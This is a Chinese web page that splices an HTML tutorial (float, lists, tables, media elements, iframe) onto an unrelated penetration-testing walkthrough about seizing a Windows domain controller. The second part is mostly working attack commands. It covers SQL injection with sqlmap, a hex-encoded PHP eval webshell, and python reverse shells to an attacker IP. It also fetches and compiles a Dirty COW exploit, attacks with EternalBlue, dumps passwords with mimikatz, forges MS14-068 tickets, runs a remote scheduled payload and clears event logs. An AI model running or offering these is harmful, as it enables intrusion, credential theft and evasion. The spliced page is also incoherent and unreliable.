整合營銷服務商
電腦端+手機端+微信端=數(shù)據(jù)同步管理
免費咨詢熱線:
電腦端+手機端+微信端=數(shù)據(jù)同步管理
免費咨詢熱線:
web網(wǎng)頁制作的工作中,元素的float屬性非常常用。顧名思義float屬性就是浮動的意思,運用了浮動屬性的元素常稱為浮動元素。我們經常使用元素浮動屬性來控制網(wǎng)頁的結構以及制作一些酷炫的效果。但是這個屬性具有難以把握的特點,下面逐條進行說明:
a. 運用了這種屬性的元素會對該元素自身的行為和表現(xiàn)有影響;
b. 對于運用浮動屬性的元素,其父級和兄弟級別的元素會對它產生干擾;
c. 浮動元素對其包含或者包含它的元素也會有影響。
對于上面所說的內容我將通過一個在我工作中遇到的問題作為例子進行說明,首先我將所用到的代碼展示如下:
先直接使用html代碼,其效果就是三行排列的段落;然后再逐行代碼進行渲染,當?shù)谝恍泻偷谒男蠧SS代碼渲染完后,我們會發(fā)現(xiàn)段落呈橫向排列而且所有的段落不在其父元素.site-nav中。其效果如下圖所示:
上圖中黃色的部分表示.site-nav的部分,而三個段落都不在其中。從這可以看出使用了浮動元素后元素不會占據(jù)文檔流的位置,而且其父元素的高度變?yōu)?。對于這樣的狀況,需要清除浮動元素的影響,具體來說就是需要在浮動元素后添加clear:both;屬性來消除其影響。
1. 什么是列表
簡單來說,列表就是信息資源的一種展示形式。它可以使信息結構化和條理化,并以列表的樣式顯示出來。
2. 列表的分類及其應用
無序列表,語法:
<ul>
<li>第一項</li>
<li>第二項</li>
<li>第三項</li>
</ul>
有序列表,語法:
<ol>
<li>第一項</li>
<li>第二項</li>
<li>第三項</li>
</ol>
定義列表,語法:
<dl>
<dt>標題</dt>
<dd>第一項</dd>
<dd>第二項</dd>
<dt>標題二</dt>
<dd>第一項</dd>
<dd>第二項</dd>
</dl>
無序列表| 無序列表由ul標簽和li標簽組成,使用ul標簽作為無序列表的聲明,使用li標簽作為每個列表項的起始。無序列表中的每項都是平級的,沒有級別之分,并且列表中的內容一般都是相對簡單的標題性質的網(wǎng)頁內容
有序列表| 有序列表由ol標簽和li標簽組成,使用ol標簽作為有序列表的聲明,使用li標簽作為每個列表項的起始,有序列表嵌套同無序列表一樣,只能ol標簽里面嵌套li標簽。有序列表ol-li一般用于顯示帶有順序編號的特定場合
定義列表|定義列表是一種很特殊的列表形式,它是標題及列表項的結合。定義列表的語法相對于無序和有序列表不太一樣,它使用dl標簽作為列表的開始,使用dt標簽作為每個列表項的起始,而對每個列表項的定義則使用dd標簽來完成。定義列表一般適用于帶有標題和標題解釋性內容的場合
列表的注意事項:
1.無序列表中的每項都是平級的,沒有級別之分,并且列表中的內容一般都是相對簡單的標題性質的頁面內容。有序列表會依據(jù)列表項的順序進行顯示。
2.在實際的網(wǎng)頁應用中,無序列表比有序列表應用更加廣泛,有序列表ol-li一般用于顯示帶有順序編號的特定場合。
3.定義列表一般適用于帶標題和標題解釋性內容的場合。
示例:有序列表
<!DOCTYPE html>
<html>
<head lang="en">
<meta charset="UTF-8">
<title></title>
</head>
<body>
<h2>有序列表的應用</h2>
<p>注意:有序列表列表項標記默認是1,有序的數(shù)字,可以使用type屬性進行更改列表項標記</p>
<p>可選擇的列表項標記有:a,A,i,I,1</p>
<ol type="a">
<li>第一項</li>
<li>第二項</li>
<li>第三項</li>
</ol>
<ol type="i">
<li>第一項</li>
<li>第二項</li>
<li>第三項</li>
</ol>
<ol type="1">
<li>第一項</li>
<li>第二項</li>
<li>第三項</li>
</ol>
</body>
</html>
示例:無序列表:
<!DOCTYPE html>
<html>
<head lang="en">
<meta charset="UTF-8">
<title></title>
</head>
<body>
<h2>無序列表的應用</h2>
<p>注意:無序列表列表項標記默認是黑色圓點,可以使用type屬性進行更改</p>
<p>可選擇的列表項標記有:小黑點:disc(默認值);方塊:square;空心圓:circle。</p>
<ul>
<li>第一項</li>
<li>第二項</li>
<li>第三項</li>
</ul>
<ul type="square">
<li>第一項</li>
<li>第二項</li>
<li>第三項</li>
</ul>
<ul type="circle">
<li>第一項</li>
<li>第二項</li>
<li>第三項</li>
</ul>
</body>
</html>
示例:定義列表
<!DOCTYPE html>
<html>
<head lang="en">
<meta charset="UTF-8">
<title></title>
</head>
<body>
<h2>定義列表的應用</h2>
<p>一般應用于帶有標題和內容,標簽dt聲明標題,dd聲明內容</p>
<dl>
<dt>水果</dt>
<dd>蘋果</dd>
<dd>香蕉</dd>
<dd>西瓜</dd>
</dl>
</body>
</html>
2.1.1為什么使用表格
1.簡單通用
由于表格行列結構簡單,以及在生活中使用廣泛,因此對它的理解和編寫都很方便。
2.結構穩(wěn)定
表格通常每行的列數(shù)一致,同行單元格高度一致且水平對齊,同列單元格寬度一致且垂直對齊這種嚴格的約束形成了一個不易變形的合資結構,堆疊排列起來結構很穩(wěn)定。
2.1.2 表格的基本語法
表格的基本結構:
單元格 | 單元格是表格的最小單位,一個或多個單元格縱橫排列組成了表格
行 | 一個或多個單元格堆疊成了行
列 | 由于表格單元格的寬度必須一致,因此單元格縱向列表形成了列
表格的語法結構:
<table>
<tr>
<!--th表示表頭-->
<th>星期</th>
<th>科目</th>
</tr>
<tr>
<td>周一</td>
<td>語文</td>
</tr>
<tr>
<td>周二</td>
<td>數(shù)學</td>
</tr>
</table>
創(chuàng)建表格的步驟:
1.創(chuàng)建表格標簽table
2.在表格標簽table創(chuàng)建行標簽tr可以有多行
3.在第一行標簽tr里創(chuàng)建單元格標簽th可以創(chuàng)建表格標題
4.在行標簽tr里創(chuàng)建單元格標簽td可以有多個單元格
為了顯示表格的輪廓,一般還需要設置table標簽的border邊框屬性,指定邊框的寬度,如下:
<table border="1" cellpadding="0" cellspacing="0">
<!--border:表格邊框;cellpadding:指定表格各單元格之間的空隙;cellspacing:代表單元格邊框到內容之間的距離-->
2.1.3 表格的跨行和跨列
-> 跨列:跨列是指單元格的橫向合并
<table>
<!--col為column的縮寫,span為跨度,所以colspan的意思是跨列-->
<tr>
<td colspan="所垮的列數(shù)">單元格的內容</td>
</tr>
</table>
-> 跨行:跨列是指單元格的縱向合并
<table>
<!--row為行的意思,rowspan即跨行-->
<tr>
<td rowspan="所挎的行數(shù)">單元格內容</td>
</tr>
</table>
示例:表格跨行和跨列的應用:課表制作
<table border=1 align="center">
<!--align='center':設置表格內容居中顯示-->
<caption align="center"><strong>成績表</strong></caption>
<tr>
<th></th>
<th colspan=5 align="center">課程</th>
<th colspan=2 align="center">周末</th>
</tr>
<tr>
<th>星期</th>
<th>星期一</th>
<th>星期二</th>
<th>星期三</th>
<th>星期四</th>
<th>星期五</th>
<th>星期六</th>
<th>星期天</th>
</tr>
<tr>
<td rowspan="3">上午</td>
<td>語文</td>
<td>數(shù)學</td>
<td>英語</td>
<td>英語</td>
<td>物理</td>
<td rowspan=6 align="center" colspan="2">休息</td>
</tr>
<tr>
<td>數(shù)學</td>
<td>數(shù)學</td>
<td>地理</td>
<td>歷史</td>
<td>化學</td>
</tr>
<tr>
<td>化學</td>
<td>語文</td>
<td>體育</td>
<td>計算機</td>
<td>英語</td>
</tr>
<tr>
<td rowspan=2>下午</td>
<td>語文</td>
<td>數(shù)學</td>
<td>英語</td>
<td>英語</td>
<td>物理</td>
</tr>
<tr>
<td>化學</td>
<td>語文</td>
<td>體育</td>
<td>計算機</td>
<td>英語</td>
</tr>
</table>
3.1.1媒體元素概述
網(wǎng)絡發(fā)展日新月異,用計算機,平板,手機打開網(wǎng)頁就可以瀏覽視頻,聽音樂。
在HTML5問世前,要在網(wǎng)頁上展示視頻、音頻、動畫等,除了使用第三方自主開發(fā)的播放器外,使用最多的工具應該算是Flash了,但是它需要在瀏覽器上安裝各種插件才能使用,有時候速度也會非常慢。HTML5的出現(xiàn)改變了這一狀況,在頁面中使用HTML5來播放音頻、視頻再也不需要安裝插件,只需要一個支持HTML5的瀏覽器就可以了。
視頻元素
HTML5中的video元素是用來播放視頻文件的,支持Ogg、MPEG4、WebM等視頻格式。
格式 | IE | Firefox | Opera | chrome | Safari --- |---|---|---|---|--- Ogg | No |3.5+ | 10.5+ |5.0+|NO MPEG 4 | 9.0+ |No | No |5.0+|3.0+ WebM | No |4.0+ | 10.6+ |6.0+ |NO
Ogg : 帶有 Theora 視頻編碼和 Vorbis 音頻編碼的 Ogg 文件
MPEG4 : 帶有 H.264 視頻編碼和 AAC 音頻編碼的 MPEG 4 文件
WebM : 帶有 VP8 視頻編碼和 Vorbis 音頻編碼的 WebM 文件
應用:
<video src="視頻路徑" controls="controls"></video>
其中src屬性用于指定要播放的視頻文件的路徑,controls屬性用于提供播放,暫停和音量控件,此外,還可以使用width和height設置視頻的寬度和高度,如果瀏覽器不支持video元素,可以在video元素中間插入一段文字用于提示,這樣,舊的瀏覽器就可以顯示這段文字給用戶看。具體操作如下:
<!DOCTYPE HTML>
<html>
<body>
<video src="movie.ogg" width="320" height="240" controls="controls">
您的瀏覽器不支持!
</video>
</body>
</html>
video 元素允許多個 source 元素。source 元素可以鏈接不同的視頻文件。瀏覽器將使用第一個可識別的格式:
<!DOCTYPE HTML>
<html>
<body>
<video width="320" height="240" controls="controls">
<source src="movie.ogg" type="video/ogg">
<source src="movie.mp4" type="video/mp4">
您的瀏覽器不支持!
</video>
</body>
</html>
video標簽的屬性
屬性 | 值 | 描述
autoplay | autoplay|如果出現(xiàn)該屬性,則視頻在就緒后馬上播放。
controls|controls|如果出現(xiàn)該屬性,則向用戶顯示控件,比如播放按鈕。
height| pixels|設置視頻播放器的高度。
loop| loop| 如果出現(xiàn)該屬性,則當媒介文件完成播放后再次開始播放。
preload| preload|如果出現(xiàn)該屬性,則視頻在頁面加載時進行加載,并預備播放。如果使用 "autoplay",則忽略該屬性。
src| url|要播放的視頻的 URL。
width| pixels|設置視頻播放器的寬度。
音頻元素
直到現(xiàn)在,仍然不存在一項旨在網(wǎng)頁上播放音頻的標準。
今天,大多數(shù)音頻是通過插件(比如 Flash)來播放的。然而,并非所有瀏覽器都擁有同樣的插件。
HTML5 規(guī)定了一種通過 audio 元素來包含音頻的標準方法。
audio 元素能夠播放聲音文件或者音頻流。
當前,audio 元素支持三種音頻格式:
格式 | IE 9|Firefox 3.5 | Opera 10.5|Chrome 3.0|Safari 3.0 ---|---|---|---|---|--- Ogg Vorbis| |√|√|√| MP3| √|||√|√ Wav| |√|√||√
應用:
<audio src="音頻路徑" controls="controls"></video>
其中src屬性用于指定要播放的音頻文件的路徑,controls屬性用于提供播放、暫停和音量控制,此外,還可以用width和height設置音頻的寬度和高度。 如果瀏覽器不支持audio元素,那么可以在audio元素中間插入一段文字用于提示,這樣,舊的瀏覽器就可以顯示這段文字給用戶
<audio src="音頻路徑" controls="controls">你的瀏覽器不支持audio標簽</audio>
audio 元素允許多個 source 元素。source 元素可以鏈接不同的音頻文件。瀏覽器將使用第一個可識別的格式:
<audio controls="controls">
<source src="song.ogg" type="audio/ogg">
<source src="song.mp3" type="audio/mpeg">
你的瀏覽器不支持audio標簽
</audio>
audio標簽的屬性
屬性 | 值 | 描述
---|---|---
autoplay | autoplay|如果出現(xiàn)該屬性,則音頻在就緒后馬上播放。
controls|controls|如果出現(xiàn)該屬性,則向用戶顯示控件,比如播放按鈕。
loop| loop| 如果出現(xiàn)該屬性,則當媒介文件完成播放后再次開始播放。
preload| preload|如果出現(xiàn)該屬性,則音頻在頁面加載時進行加載,并預備播放。如果使用 "autoplay",則忽略該屬性。
src| url|要播放的音頻的 URL。
4.1.1 頁面布局分析
當要制作一個頁面時,如何入手來進行頁面布局呢?
大家容易產生的錯誤做法如下:自上而下用相應 的標簽把內容添加進去。
這樣做為什么不對呢?
正確的做法如下:先不用像上面一樣直接用標簽去寫內容,而是先分析頁面的大體結構。不難發(fā)現(xiàn),大部分網(wǎng)站都是分成上中下結構,三部分。即頁面頭部,頁面主體,頁面底部。分好結構后再向這三塊里加入對應的內容。
可能到這里有人就會疑惑了,為什么要在它外面套層殼再寫內容?直接寫不是更省事?給大家舉例子:“一個人到超市買了很多東西,他就開始一樣一樣地往家里搬,搬了好久才搬完。另外一個人也買了很多東西,這個人就買了個購物袋,把這些東西放到購物袋中一次性就提回家了”。其實網(wǎng)頁布局之所以要先劃分結構,就是為了后面更容易地將一大塊的內容移動到想要放的位置,而不是每個元素都要分別移動,這樣能提高開發(fā)效率,降低開發(fā)難度。
4.1.2 HTML5提供了新的元素來創(chuàng)建更好的頁面結構
標簽 | 描述
---|---
header|定義了文檔的頭部區(qū)域
nav|定義導航鏈接的部分。
article| 定義頁面獨立的內容區(qū)域。
aside| 定義頁面的側邊欄內容。
section | 定義文檔中的節(jié)(section、區(qū)段)。
footer| 定義 section 或 document 的頁腳。
bdi | 允許您設置一段文本,使其脫離其父元素的文本方向設置。
command| 定義命令按鈕,比如單選按鈕、復選框或按鈕
details| 用于描述文檔或文檔某個部分的細節(jié)
dialog| 定義對話框,比如提示框 summary| 標簽包含 details 元素的標題
figure| 規(guī)定獨立的流內容(圖像、圖表、照片、代碼等等)。
figcaption| 定義 figure 元素的標題 mark| 定義帶有記號的文本。
meter| 定義度量衡。僅用于已知最大和最小值的度量。
progress| 定義任何類型的任務的進度。
ruby |定義 ruby 注釋(中文注音或字符)。
rt |定義字符(中文注音或字符)的解釋或發(fā)音。
rp| 在 ruby 注釋中使用,定義不支持 ruby 元素的瀏覽器所顯示的內容。
time|定義日期或時間。 wbr|規(guī)定在文本中的何處適合添加換行符。
4.1.3 iframe框架
frame 元素會創(chuàng)建包含另外一個文檔的內聯(lián)框架(即行內框架)。 在 HTML 4.1 Strict DTD 和 XHTML 1.0 Strict DTD 中,不支持 iframe 元素。 提示:您可以把需要的文本放置在 iframe 標簽之間,這樣就可以應對無法理解 iframe 的瀏覽器。
<iframe width=500 height=250 frameborder=0 scrolling=auto src="URL"></iframe>
iframe屬性的使用: iframe內聯(lián)框架的常用屬性包括name、width、height。其中name屬性可以和前面 學過的錨鏈接結合起來實現(xiàn)頁面間的相互跳轉。具體步驟如下:
1.在被打開的框架上name屬性,關鍵代碼如下:
<iframe name="mainFram" src="subframe/the_second.html"/>
2.在超鏈接上設置target目標窗口屬性為希望顯示框架窗口名,關鍵代碼如下:
<a href="subframe/the_second.html"target="mainFram">下邊顯示第二頁</a>
4.1.4 iframe應用
<!DOCTYPE html>
<html>
<head lang="en">
<meta charset="utf-8"/>
<title>iframe的使用</title>
</head>
<body>
<h1>使用iframe嵌套網(wǎng)頁</h1>
<p><a href="http://www.baidu.com" target="mainFrame">點擊打開百度</a><br /><br />
<a href="https://www.yuntuzhilian.com/" target="mainFrame">點擊打開云圖智聯(lián)</a><br /><br />
<a href="subframe/the_first.html" target="mainFrame">點擊打開另一個HTML頁面</a><br />
</p>
<iframe name="mainFrame" width="1000px" height="700px" src="subframe/the_first.html" />
</body>
</html>
<!DOCTYPE html>
<html>
<head lang="en">
<meta charset="utf-8"/>
<title>page1</title>
</head>
<body>
我是另外一個HTML頁面
</body>
</html>
1、 無序列表由ul和li標簽組成,使用無序列表的內容沒有順序之分,每個列表項獨占一行,列表前默認有實心小黑圓點;
2、有序列表由ol和li標簽組成,使用有序列表排列的內容通過顯示順序編寫,每個列表項獨占一行;
3、定義里標由dl、dt、dd標簽組成,通常用于帶有標題和標題解釋性內容的場合,dt表示標題,dd表示標題主實行內容;
4、掌握表格的基本使用方法:
1.使用table、tr、td創(chuàng)建表格
2.制作跨列、跨行的表格
1.跨列:colspan="橫向跨的單元格數(shù)"
2.跨行:rowspan="縱向跨的單元格數(shù)"
5、網(wǎng)頁中的媒體元素包括video視頻元素和audio音頻元素;
6、媒體元素共有的屬性:src(鏈接地址)、controls(控件播放控件);
7、可以讓媒體元素在不同瀏覽器下都支持播放的元素(source);
8、語義化結構元素(header、section、article、nav、aside、footer)的使用;
9、常用的框架技術iframe內聯(lián)框架;
10、配合使用a標簽和target屬性及iframe標簽的name屬性,可以實現(xiàn)窗口間的關聯(lián)。
(想要了解更多的職場,職業(yè)規(guī)劃方面的經驗,文章第一時間發(fā)布于云圖智聯(lián)官網(wǎng))
通過Kali Linux拿到域控權限
2021最新整理網(wǎng)絡安全\滲透測試/安全學習(全套視頻、大廠面經、精品手冊、必備工具包)一>關注我,私信回復"資料"獲取<一
使用dirbuster工具掃描網(wǎng)站根目錄
設置kali默認字典文件/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
掃描獲得phpinfo.php
得到網(wǎng)站絕對路徑信息
通過測試發(fā)現(xiàn)存在sql整型注入報錯情況,進一步獲取webshell
通過sqlmap測試發(fā)現(xiàn)存在sql注入
sqlmap ‐u "http://IP:8888/newsshow.php?cid=4&id=19*" ‐‐dbms MYSQL ‐v3
這里有絕對路徑的情況下,可直接寫入webshell。這里使用sqlmap os-shell的功能
#通過sqlmap獲取命令執(zhí)行會話
sqlmap ‐u “http://IP/newsshow.php?cid=4&id=19*” ‐‐dbms MYSQL ‐v3 ‐‐os‐ shell`
http://IP/newsshow.php?cid=4&id=19 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,0x3c3f706870206576616c28245f504f53545b2770617373275d29 3f3e,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 into outfile '/var/www/html/webshell.php'
為了更好做后續(xù)操作,進行反彈shell
os‐shell> uname ‐a
os‐shell> whereis python`
由于網(wǎng)站上為linux默認安裝python,可直接生成python反彈腳本
#生成python反彈腳本
msfvenom ‐p python/meterpreter/reverse_tcp LHOST=IP LPORT=4444 ‐f raw
#msf監(jiān)聽反向連接會話
msfconsole
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp set LHOST IP
set LPORT 4444
run
#msf監(jiān)聽快速啟動
cat py_reverse_tcp.rc
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp set LHOST 192.168.0.17
set LPORT 4444
exploit
msfconsole ‐r py_reverse_tcp.rc
#在sqlmap os‐shell模式下執(zhí)行python meterpreter反彈腳本
os‐shell> python ‐c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF‐8')} [sys.version_info[0]] ('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQ0KZm9yIHggaW4gcmFuZ2UoMTApOg0KCXRy eToNCgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQ0KCQlzLmNvbm 5lY3QoKCYjMzk7SVAmIzM5Oyw0NDQ0KSkNCgkJYnJlYWsNCglleGNlcHQ6DQoJCXRpbWUu c2xlZXAoNSkNCmw9c3RydWN0LnVucGFjaygmIzM5OyZndDtJJiMzOTsscy5yZWN2KDQpKV swXQ0KZD1zLnJlY3YobCkNCndoaWxlIGxlbihkKSZsdDtsOg0KCWQrPXMucmVjdihsLWxl bihkKSkNCmV4ZWMoZCx7JiMzOTtzJiMzOTs6c30pDQo=')))"
#kali監(jiān)聽會話
root@kali:~# nc ‐lvvp 6666
#在sqlmap os‐shell模式下執(zhí)行python bash反彈腳本
os‐shell> python ‐c "import os;import pty;import socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((' IP',6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.filen o(),2);os.putenv('HISTFILE','/dev/null');pty.spawn('/bin/bash');s.clos e();"`
sqlmap執(zhí)行:
監(jiān)聽端口返回反彈shell結果:
拿到shell后,嘗試提升權限
通過uname -a獲取當前系統(tǒng)內核版本
根據(jù)可已知內核漏洞下載對應的提權程序(該處使用臟牛內核提權)
cd /tmp/ wget ‐‐no‐check‐certificate https://raw.githubusercontent.com/K3vinPlus/sundry/master/DirtyCow/dir ty.c gcc ‐pthread dirty.c ‐o dirty ‐lcrypt ./dirty 123456
獲得firefart用戶,權限為root
su firefart
切換用戶為firefart后,將passwd恢復,避免root用戶無法使用
mv /tmp/passwd.bak /etc/passwd
通過查看網(wǎng)卡信息后發(fā)現(xiàn)存在內網(wǎng)地址信息
meterpreter自動路由(首選)
meterpreter > run autoroute ‐s 10.0.1.0/24 meterpreter > run autoroute ‐p
由于web服務器第二張網(wǎng)卡無法上網(wǎng),需進行內網(wǎng)代理
在web服務器的shell下,下載tunnel.nosocket.php文件,做代理流量
1、網(wǎng)絡下載 wget ‐‐no‐check‐certificate https://raw.githubusercontent.com/K3vinPlus/reGeorg/master/tunnel.noso cket.php mv tunnel.nosocket.php /var/www/html/ 2、本地上傳 upload /root/reGeorg/tunnel.nosocket.php /var/www/html
可正常訪問tunnel.nosocket.php文件
[
Kali上執(zhí)行reGeorg代理腳本
python reGeorgSocksProxy.py ‐p 9999 ‐u http://IP:8888/tunnel.nosocket.php
修改proxychains配置文件,在末行添加socks信息。
vim /etc/proxychains.conf socks5 127.0.0.1 9999
##msf自帶代理設置
setg Proxies socks5:127.0.0.1:9999
使用msf自帶端口掃描模塊,探測出10.0.1.9和10.0.1.254都存在445、3389端口。
use auxiliary/scanner/portscan/tcp set RHOSTS 10.0.1.1/24 set PORTS 21,22,23,80,389,445,873,1433,1521,2049,2181,2375,3306,3389,4899,5432,5 631,5900,5938,5984,6379,8000,8080,7001,9080,9200,10051,11211,20880,270 17,50070 set THREADS 10 exploit
通過代理方式,使用msf框架掃描內網(wǎng)網(wǎng)段中存在MS17-010漏洞主機
root@kali:~# proxychains msfconsole use auxiliary/scanner/smb/smb_ms17_010 set RHOST 10.0.1.0‐254 set threads 10 exploit
通過meterpreter路由方式,background之后使用ms17-010攻擊模塊進行攻擊
use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set RHOSTS 10.0.1.9 run
meterpreter > sysinfo
加載mimikatz模塊
meterpreter > load mimikatz #讀取內存中存放的賬號密碼明文信息 meterpreter > wdigest
meterpreter > run post/windows/gather/enum_logged_on_users
net group "domain controllers" /domain ping dc1.kevin.com
proxychains python ms14‐068.py ‐u liujiafeng@kevin.com ‐s S‐1‐5‐21‐ 4289546598‐4075965387‐827630551‐1111 ‐d 10.0.1.254 ‐p kevin@123
use auxiliary/admin/kerberos/ms14_068_kerberos_checksum set DOMAIN KEVIN.com set USER liujiafeng set PASSWORD kevin@123 set USER_SID S‐1‐5‐21‐4289546598‐4075965387‐827630551‐1111 set RHOST 10.0.1.254
#kali切換目錄到loot下將ms14‐068 bin票據(jù)復制到物理機 /root/.msf4/loot/ #物理機通過mimikatz轉為kirbi文件 mimikatz # kerberos::clist 20191223050146_default_10.0.1.254_windows.kerberos_122860.bin /export
#再將kirbi文件放到kali ticket_converter轉換腳本目錄下 #將kirbi文件轉為ccache python ticket_converter.py 0‐00000000‐liujiafeng@krbtgt‐KEVIN.COM.kirbi TGT_liujiafeng@kevin.com.ccache mv TGT_liujiafeng@kevin.com.ccache /root/pykek/
生成msf監(jiān)聽端口程序
msfvenom ‐p windows/x64/meterpreter/bind_tcp LHOST=10.0.1.254 LPORT=4444 ‐f exe ‐o /root/pykek/test.exe
新建一個msf會話監(jiān)聽正向連接payload
use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set RHOST 10.0.1.254
上傳利用工具、ms14-086黃金票據(jù)到win7跳板機上
upload /root/pykek/TGT_liujiafeng@kevin.com.ccache C:/users/kevin upload /usr/share/windows‐resources/mimikatz/x64/mimikatz.exe C:/Users/kevin upload /root/pykek/test.exe c:/users/kevin shell
在win7跳板機上執(zhí)行
`#清空票據(jù) klist purge
#導入票據(jù)
cd c:/users/kevin
mimikatz.exe
kerberos::ptc TGT_liujiafeng@kevin.com.ccache
再通過win7跳板機復制test.exe到域控c盤,并通過at命令添加定時任務執(zhí)行test.exe
`copy test.exe \dc1.kevin.com\c$ dir \dc1.kevin.com\c<pre class=“copy-codeblocks” style=“font-family: Consolas, Menlo, Monaco, “Lucida Console”, “Liberation Mono”, “DejaVu Sans Mono”, “Bitstream Vera Sans Mono”, “Courier New”, monospace; font-size: 15.008px; display: block; position: relative; overflow: visible; color: rgb(34, 34, 34); font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; background-color: rgb(255, 255, 255); text-decoration-style: initial; text-decoration-color: initial;”
net time \dc1.kevin.com at \dc1.kevin.com 15:42:00 c:\test.exe
查看當前域控at定時任務
at \dc1.kevin.com
在域控at定時任務執(zhí)行后,連接域控4444端口
netstat ‐ano |findstr "4444"
結束msf木馬進程,刪除exe進程
at \dc1.kevin.com 16:23:00 cmd /c del c:\test.exe
刪除win7工具
cd c:/users/kevin rm TGT_liujiafeng@kevin.com.ccache rm mimikatz.exe
windows刪除系統(tǒng)日志
clearev
*請認真填寫需求信息,我們會在24小時內與您取得聯(lián)系。
